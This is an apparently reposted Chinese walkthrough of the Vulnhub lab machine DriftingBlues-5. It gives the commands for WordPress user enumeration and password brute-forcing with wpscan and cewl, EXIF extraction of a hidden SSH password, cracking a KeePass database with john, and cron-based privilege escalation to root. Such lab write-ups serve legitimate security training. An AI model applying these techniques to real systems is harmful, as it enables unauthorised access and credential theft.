看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-5 - 代码天地

看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-5

编程语言 2022-06-22 01:22:58 阅读次数: 0

Vulnhub靶机DriftingBlues-5渗透测试详解

Vulnhub靶机介绍：

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这期更新一下Vulnhub DriftingBlues 系列还是老样子找到FLAG即可，可能比较偏向CTF点。

Vulnhub靶机下载：

官网地址：https://www.vulnhub.com/entry/driftingblues-5,662/
在这里插入图片描述

Vulnhub靶机漏洞详解：

前言：这里又是DriftingBlues-2的问题需要自己配网卡

具体参考：https://blog.csdn.net/Aluxian_/article/details/125095660?spm=1001.2014.3001.5501

①：信息收集：

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机：kali IP ：192.168.205.133 靶机IP ：192.168.205.142

使用命令：nmap -sS -A -T4 -n 192.168.205.142

在这里插入图片描述

发现开启了80端口和22端口先访问80端口发现是CMS系统是wordpress 使用dirb 扫一下后台目录：/wp-admin/user

在这里插入图片描述

②：暴力破解：

既然知道了后台现在需要知道账号密码进行登入使用wpscan 这个工具进行枚举（发现了一些用户）

wpscan --url http://192.168.205.142 -e u

在这里插入图片描述

接着我们使用工具cewl 制作一个名为passwd.txt的字典。

cewl -m 3 -w passwd.txt http://192.168.205.142

wpscan --url http://192.168.205.142/ -e u --passwords passwd.txt

在这里插入图片描述
最后得到了账号密码为：gill /interchangeable

登入成功后发现有一张前端没有的图片感觉比较可疑把他下载看看
在这里插入图片描述

wget http://192.168.205.142/wp-content/uploads/2021/02/dblogo.png

在这里插入图片描述
这里使用一个工具exiftool 最新kaili没有得装一个这个工具用来对EXIF信息解析

apt-get Install exiftool

exiftool  /root/桌面/dblogo.png

在这里插入图片描述
最后发现了隐藏得 ssh密码：59583hello

③：ssh登入：

尝试登入，发现登入成功！！！获得了第一个flag

ssh gill@192.168.205.142

在这里插入图片描述

④：KDBX文件密码爆破：

还发现了一个 keyfile.kdbx 文件（第一次遇到这种文件）

什么是DKBX文件？https://www.solvusoft.com/zh-cn/file-extensions/file-extension-kdbx/
在这里插入图片描述

python -m SimpleHTTPServer 80 #开启临时web服务  但是报错了

在这里插入图片描述
那我们就换一种方法：使用scp 这个命令

scp gill@192.168.205.142:/home/gill/key* /root

在这里插入图片描述

将 keyfile.kdbx 内容转为 john 支持的格式：keepass2john keyfile.kdbx > Keepasshash.txt

在使用john破解密码：john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt

在这里插入图片描述
最终破解到密码为：porsiempre

⑤：定时提权：

打开：https://app.keeweb.info/

在这里插入图片描述
发现了六个密码分别为：

2real4surreal 
buddyretard
closet313
exalted
fracturedocean
zakkwylde

尝试使用这些密码进去但是并没有发现可用的信息

靶机下载pspy64：https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

使用WinSCP把pspy64传到靶机的/home/gill/中

在这里插入图片描述

chmod 777 pspy64 #给权限
./pspy64  #执行脚本

发现了根目录下，每分钟就执行一个key.sh的脚本文件
在这里插入图片描述
使用keyfile.kdbx文件中的名称，新建文件fracturedocean然后建立正确的文件名就会获得一个新的文件rootcreds.txt

在这里插入图片描述
如果生成了cat一下发现了 root的账号密码！！！

⑥：获取flag：

在这里插入图片描述
至此获取到了所有得flag，渗透测试结束。

Vulnhub靶机渗透总结：

1.cewl 生成字典和wpscan 工具暴力破解的使用
2.Exiftool 这个工具用来对EXIF信息解析(第一次了解这个工具的使用和作用)
3..kdbx文件密码破解（新知识点，第一次做花的时间比较多）
4.如果临时开启不了web服务可以使用scp 这个命令（非常好用！！）
5.解密 keepass 数据库获取密码（虽然没啥用但是也是第一次了解新知识点）
6.定时提权下载脚本pspy64 查看创建key 文件提权

DriftingBlues系列的第五个靶机了后继会继续更新,创作不易希望对大家有所帮助喜欢的话麻烦大家给个一键三连你的开心就是我最大的快乐！！

猜你喜欢

转载自blog.csdn.net/Aluxian_/article/details/125356541

看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-5

看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-3

看完这篇教你玩转渗透测试靶机Vulnhub——DriftingBlues-2

看完这篇教你玩转渗透测试靶机vulnhub——Ai-Web1

看完这篇教你玩转渗透测试靶机vulnhub——My File Server: 1

看完这篇教你玩转渗透测试靶机vulnhub——My File Server: 2

看完这篇教你玩转渗透测试靶机vulnhub—Corrosion:1

看完这篇教你玩转渗透测试靶机vulnhub—Emplre: Lupinone

看完这篇教你玩转渗透测试靶机vulnhub—DarkHole2

看完这篇教你玩转渗透测试靶机vulnhub—Emplre: Breakout

看完这篇教你玩转渗透测试靶机vulnhub—Corrosion:2

看完这篇教你玩转渗透测试靶机——Metasploitable2

看完这篇，Docker你就入门了

看完这篇，Redis你就入门了

看完这篇，你要入门动态规划

看完这篇你就会做商业BP了！

CSS的flex布局看完这篇你就懂了

看完这篇，你应该知道什么是Linux了~

事务看完这篇你只能算入门

看完这篇HTTP可以让你与HR扯皮了

webpack打包原理 ? 看完这篇你就懂了 !

看完这篇文章你不在是测试菜鸟！！

看完这篇文章，你将完全掌握性能测试

看完这篇轻松玩转Git：详细、浅显、易学

看完这篇你还不懂指针，你捶我！！！

在线pdf文档合并看完这篇你就是高手

看完这篇Linux基本的操作你就会了

看完这篇，你谈薪就有救了！

HashMap? ConcurrentHashMap? 相信看完这篇没人能难住你！

看完这篇文字让你对反向跟单部在徘徊

今日推荐

周排行

Django xadmin 中 m2m_transfer 和 ueditor 同时存在导致显示失效的问题

【Kafka】Kafka指定分区消费

2019最新《谷粒学院-MySQL高级课程》

14. Longest Common Prefix LeetCode题解

02linux基础服务-rsync+sersync

【知识强化第一章】操作系统概述 1.1 操作系统的基本概念

mongodb基础（3）导入导出

VueJS----[全局API-2.4]----Vue的生命周期（钩子函数）

执行python -m uiautomator2 init 报错

【leetcode】合并两个有序链表(python实现)

每日归档

更多

2025-03-01(0)

2025-02-28(0)

2025-02-27(0)

2025-02-26(0)

2025-02-25(0)

2025-02-24(0)

2025-02-23(0)

2025-02-22(0)

2025-02-21(0)

2025-02-20(0)